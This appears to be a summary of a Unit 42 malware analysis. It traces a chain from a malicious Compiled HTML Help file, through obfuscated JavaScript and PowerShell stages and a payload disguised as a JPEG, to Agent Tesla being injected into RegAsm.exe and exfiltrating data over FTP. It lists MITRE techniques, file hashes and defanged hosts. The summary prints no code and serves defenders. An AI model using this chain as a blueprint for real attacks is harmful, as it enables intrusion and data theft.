Unit 42 analyzes a multi-stage attack that begins with a malicious Compiled HTML Help (.chm) file delivered inside a 7z archive and culminates with Agent Tesla loading and exfiltrating data via FTP. The operation uses obfuscated JavaScript and PowerShell across several stages to evade defenses and highlights why non-traditional file types require vigilance. #AgentTesla #ORDER_OF_CONTRACT #pk_consult #videoalliance
Keypoints
- The initial payload is a 7zip archive named ORDER OF CONTRACT-pdf.7z containing ORDER OF CONTRACT-pdf.chm (SHA256: 081fd54d8d4731bbea9a2588ca53672feef0b835dc9fa9855b020a352819feaa) that, when opened, displays a decoy window and executes code.
- The CHM file contains obfuscated JavaScript (kkjhk.htm) that, when run, reveals code via the r variable and triggers PowerShell execution.
- Deobfuscated PowerShell uses Test-Connection to ping Google to verify connectivity before downloading and executing code from http://pk-consult[.]hr/N2.jpg.
- The downloaded content is not a JPEG but additional PowerShell code that decompresses and loads several byte arrays in memory; these can be written to files for analysis.
- The final payload consists of a loader DLL (SHA256: 0fd2e47d373e07488748ac63d9229fdef4fd83d51cf6da79a10628765956de7a) and a gzip-compressed Agent Tesla (SHA256: c684f1a6ec49214eba61175303bcaacb91dc0eba75abd0bd0e2407f3e65bce2a); Agent Tesla is loaded into RegAsm.exe for execution and exfiltrates via FTP to ftp.videoalliance[.]ru.
- The attack illustrates attackers’ interest in bypassing security controls and training by abusing Compiled HTML Help, a less-common delivery method alongside more typical document/script approaches.
MITRE Techniques
- [T1204] User Execution – Malicious CHM file triggers execution when opened, displaying a decoy window. Quote: “When the victim opens the help file, this apparently innocuous window displays.”
- [T1027] Obfuscated/Compressed Files and Information – The file contains obfuscated JavaScript that is executed. Quote: “The file contains obfuscated JavaScript that is executed when the file is opened.”
- [T1140] Deobfuscate/Decode Files or Information – Deobfuscation of the PowerShell/JS to read the code; quote: “We can deobfuscate this code… by removing the final obfuscated Invoke-Expression cmdlet.”
- [T1059.001] PowerShell – PowerShell is used to download and execute further code after initial execution. Quote: “PowerShell Test-Connection cmdlet to ping Google to verify connectivity before continuing. The sample then downloads and executes code from http://pk-consult[.]hr/N2.jpg.”
- [T1105] Ingress Tool Transfer – Downloading and executing code from a remote server (http://pk-consult[.]hr/N2.jpg). Quote: “downloads and executes code from http://pk-consult[.]hr/N2.jpg.”
- [T1055] Process Injection – The final Agent Tesla payload loads into the RegAsm.exe process to execute. Quote: “loader DLL loads Agent Tesla into the RegAsm.exe process to execute.”
- [T1041] Exfiltration – Agent Tesla uses FTP to exfiltrate data to ftp.videoalliance[.]ru. Quote: “This Agent Tesla sample uses FTP and connects to ftp.videoalliance[.]ru for data exfiltration.”
Indicators of Compromise
- [File Hash] 3446ec621506d87d372c596e1d384d9fd2c1637b3655d7ccadf5d9f64678681e, 081fd54d8d4731bbea9a2588ca53672feef0b835dc9fa9855b020a352819feaa, 9ba024231d4aed094757324d8c65c35d605a51cdc1e18ae570f1b059085c2454, 0fd2e47d373e07488748ac63d9229fdef4fd83d51cf6da79a10628765956de7a, c684f1a6ec49214eba61175303bcaacb91dc0eba75abd0bd0e2407f3e65bce2a – Hashes associated with the components (ORDER OF CONTRACT-pdf.7z, ORDER OF CONTRACT-pdf.chm, N2.jpg, loader DLL, Agent Tesla payload).
- [File Name] ORDER OF CONTRACT-pdf.7z, ORDER OF CONTRACT-pdf.chm, N2.jpg, GC.dll, Agent Tesla dotNet executable – Filenames observed in the attack chain.
- [URL] hxxp://pk-consult[.]hr/N2.jpg, ftp.videoalliance[.]ru – Remote download and exfiltration endpoints used by the payload.
- [Domain] pk-consult.hr, videoalliance.ru – Domains involved in hosting/downloading components and exfiltration.
Read more: https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/